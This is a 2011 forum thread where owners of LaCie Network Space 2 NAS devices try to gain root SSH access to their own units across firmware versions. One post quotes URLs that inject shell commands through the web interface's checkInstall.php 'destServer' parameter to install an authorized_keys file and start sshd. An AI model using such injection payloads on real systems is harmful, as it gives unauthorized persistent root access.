Please the simplest explaination to have SSH

Flight777
Posts: 10
Joined: Mon Jun 13, 2011 8:15 am

Re: Please the simplest explaination to have SSH

Post by Flight777 » Sun Jun 26, 2011 9:08 am

Sorry for my late reply (was away for a view days). I tried a few times again and it finally worked. Thanks for your support!

critzulescu
Posts: 7
Joined: Thu May 12, 2011 9:53 am

Re: Please the simplest explaination to have SSH

Post by critzulescu » Thu Jun 30, 2011 10:14 pm

Hello all,
I have bought last month one Lacie Network Space 2 (1 Terra) box with 1.2.6 installed. After I upgraded to 1.2.92 version (last one available on that time and also the newest today) I've tried to obtain root using kalleguld links:

Code: Select all

http://192.168.0.4/browser/plugins/access.ssh/checkInstall.php?destServer=2>/dev/null||mkdir%20/root/.ssh%3Bcp%20/shares/OpenShare/authorized_keys%20/root/.ssh%3Becho%20sshd%3E%3E/etc/initng/runlevel/default.runlevel%3B/etc/initng/sshd%20start
or

Code: Select all

http://192.168.0.4/browser/plugins/access.ssh/checkInstall.php?destServer=2>/dev/null||echo%20sshd%3E%3E/etc/initng/runlevel/default.runlevel
Yesterday, I bought another one, this time a 2 Terra one. I've observed that it had 1.2.92 already installed and I tried to do the same thing but the same links returned the "404 - Not Found" error message in the browser. I also tried all methods (vulnerability web interface) and all links returned the same thing "404 - Not Found".

I've tried to re-write the 1.2.92 default version instaled with 1.2.92 version that I found on lacie.com but the result was the same.
I've reset it too factory settings but that didn't lead anywhere also, as the factory FW version is 1.2.92

Is there a workaround for this?
Am I doing something wrong? This is actually the same product (even if there are different sizes) with the same versions.

One link using first box did the trick and the same link with the second box returns the "404 - Not Found" error.

kalleguld
Posts: 36
Joined: Thu Mar 31, 2011 10:55 am

Re: Please the simplest explaination to have SSH

Post by kalleguld » Fri Jul 01, 2011 9:19 am

It looks like LaCie has closed the vulnerability, I'm afraid. Your best option is probably to open the NAS and connect the hard drive to a Linux computer. Let us know if you need help with that.

Ricky65
Posts: 4
Joined: Thu Jul 14, 2011 10:48 am
Location: Milan - Italy

Re: Please the simplest explaination to have SSH

Post by Ricky65 » Thu Jul 14, 2011 4:24 pm

critzulescu wrote:Hello all,
I have bought last month one Lacie Network Space 2 (1 Terra) box with 1.2.6 installed. After I upgraded to 1.2.92 version (last one available on that time and also the newest today) I've tried to obtain root using kalleguld links:

Yesterday, I bought another one, this time a 2 Terra one. I've observed that it had 1.2.92 already installed and I tried to do the same thing but the same links returned the "404 - Not Found" error message in the browser. I also tried all methods (vulnerability web interface) and all links returned the same thing "404 - Not Found".

I've tried to re-write the 1.2.92 default version instaled with 1.2.92 version that I found on lacie.com but the result was the same.
I've reset it too factory settings but that didn't lead anywhere also, as the factory FW version is 1.2.92

One link using first box did the trick and the same link with the second box returns the "404 - Not Found" error.
So the trick is still working with a NS2 updated from 1.2.6 to 1.2.92, while it doesn't work more on a NS2 with 1.2.92 FW natively installed ?
When did you applied the hack ? Before or after updating the FW from 1.2.6 to 1.2.92 ?

Maksims
Posts: 12
Joined: Thu Jul 07, 2011 5:45 am

Re: Please the simplest explaination to have SSH

Post by Maksims » Sat Jul 16, 2011 3:41 pm

I have succeeded with PuTTy and NS2 fw 1.2.92 but i have problems with logging in:

Code: Select all

login as: admin
Server refused our key
admin@192.168.11.4's password:
Connection closed by remote host
After entering the correct password for admin account the popup appears with the last message in the code. Whats wrong?

edit: ahh, got it, it must be root :)

Ricky65
Posts: 4
Joined: Thu Jul 14, 2011 10:48 am
Location: Milan - Italy

Re: Please the simplest explaination to have SSH

Post by Ricky65 » Sun Jul 17, 2011 9:50 am

Maksims wrote:I have succeeded with PuTTy and NS2 fw 1.2.92 but i have problems with logging in:
edit: ahh, got it, it must be root :)
So the trick work fine also with 1.2.92 ?
Both with a 1.2.92 updated by an earlier release and with native 1.2.92 ?

Maksims
Posts: 12
Joined: Thu Jul 07, 2011 5:45 am

Re: Please the simplest explaination to have SSH

Post by Maksims » Sun Jul 17, 2011 1:54 pm

Thats right, updated system some time ago to 1.2.92 from previous fw. Now tried to get root with PuTTy and all works like a charm - no problems. ;)

critzulescu
Posts: 7
Joined: Thu May 12, 2011 9:53 am

Re: Please the simplest explaination to have SSH

Post by critzulescu » Wed Aug 03, 2011 10:18 am

So you didn't hacked a native 1.2.92 FW.
I was also able to hack an upgraded 1.2.92 FW (former 1.2.91, I think), but when I tried to do the same thing on a native 1.2.92 FW, all those tricks didn't worked any more!

I will try this month the open the NAS and to connect the HDD to a linux computer, maybe I will have better results this way.

Post Reply